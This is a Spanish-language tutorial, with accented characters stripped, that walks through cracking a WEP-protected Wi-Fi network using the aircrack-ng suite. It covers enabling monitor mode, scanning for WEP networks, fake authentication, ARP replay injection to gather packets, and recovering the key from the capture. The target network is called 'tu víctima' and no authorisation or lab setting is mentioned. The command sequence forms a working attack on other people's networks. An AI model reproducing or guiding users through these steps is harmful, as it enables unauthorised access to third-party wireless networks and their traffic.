Crackeo de Redes Inalmbricas con cifrado WEP

De ahora en adelante cada script lo ejecutars en consolas diferentes.

Uso de Scripts la Suite de Aircrack.

airmon-ng (Para crear la interfaz de modo monitor)
airodump-ng (Ver redes cercanas)
aireplay-ng (Hacer ataques a la red "Access Point")
aircrack-ng (Crackeo de la password de la red)

1. Modo monitor.
airmon-ng start wlan0
Se crea la interfaz "mon0", en la mayora de los casos.


2. Ver redes con cifrado WEP cercanas.
airodump-ng mon0
o ms rpido con:
airodump-ng --encrypted WEP mon0
Cuando tengas a tu vctima en lista presiona Ctrl+C para detener el escaneo de redes.

3. Autenticacin falsa a la red
aireplay-ng -1 0 -a BSSID -h 00:11:22:33:44:55 -e ESSID mon0
ste script funciona de la siguiente forma:
Se hace un ataque, el -1 indica que se har Una autenticacin falsa a la red "Access Point"
en la opcin de "-h 00:11:22:33:44:55" va la MAC Address de tu interfaz de red (wlan0)
Para saberla escribe en otra consola, ifconfig
Ah aparecer la MAC, reemplazala por esa que est de ejemplo.
Reemplaza "ESSID" por el nombre de la red. Tal cual te la ensee en airodump-ng
Puede que les aparezca un mensaje. Si es as, entonces luego de "mon0" escribe --ignore-negative-
one
El error se debe a un mal reconocimiento del chipset de wlan, o puedes resolverlo instalando el
parche de kernel.

4. Captura de paquetes ARP.
aireplay-ng -3 -b BSSID -h 00:11:22:33:44:55 mon0
El -3 indica que se har una captura de paquetes ARP.
Reemplaza de nuevo BSSID por la de la red.
Igual "-h 00:11:22:33:44:55" con tu MAC wlan
Ahora en la consola actual se empezarn a capturar los paquetes ARP.
Para una mayor rapidez vuelve a ejecutar el paso 3 en la misma consola que est.

Necesitas por lo menos 5000 paquetes, "ACK received".
Pero si obtienes ms de 20000 mucho ms rpido ser crackear la red.
Oprime Ctrl+C al obtener los paquetes necesarios o los que quieras.

5. Obtener contrasea
aircrack-ng -b BSSID NombreArchivo-01.cap
Hora de crackear la password de la red. El "NombreArchivo-01.cap" se reemplaza por la captura de
paquetes que se hizo anteriormente con el paso 4.
Si no sabes donde est el archivo, puedes buscarlo abriendo una carpeta y en la carpeta HOME
est.


No es ms. En cuestin de segundos o minutos obtendrs la password de la red.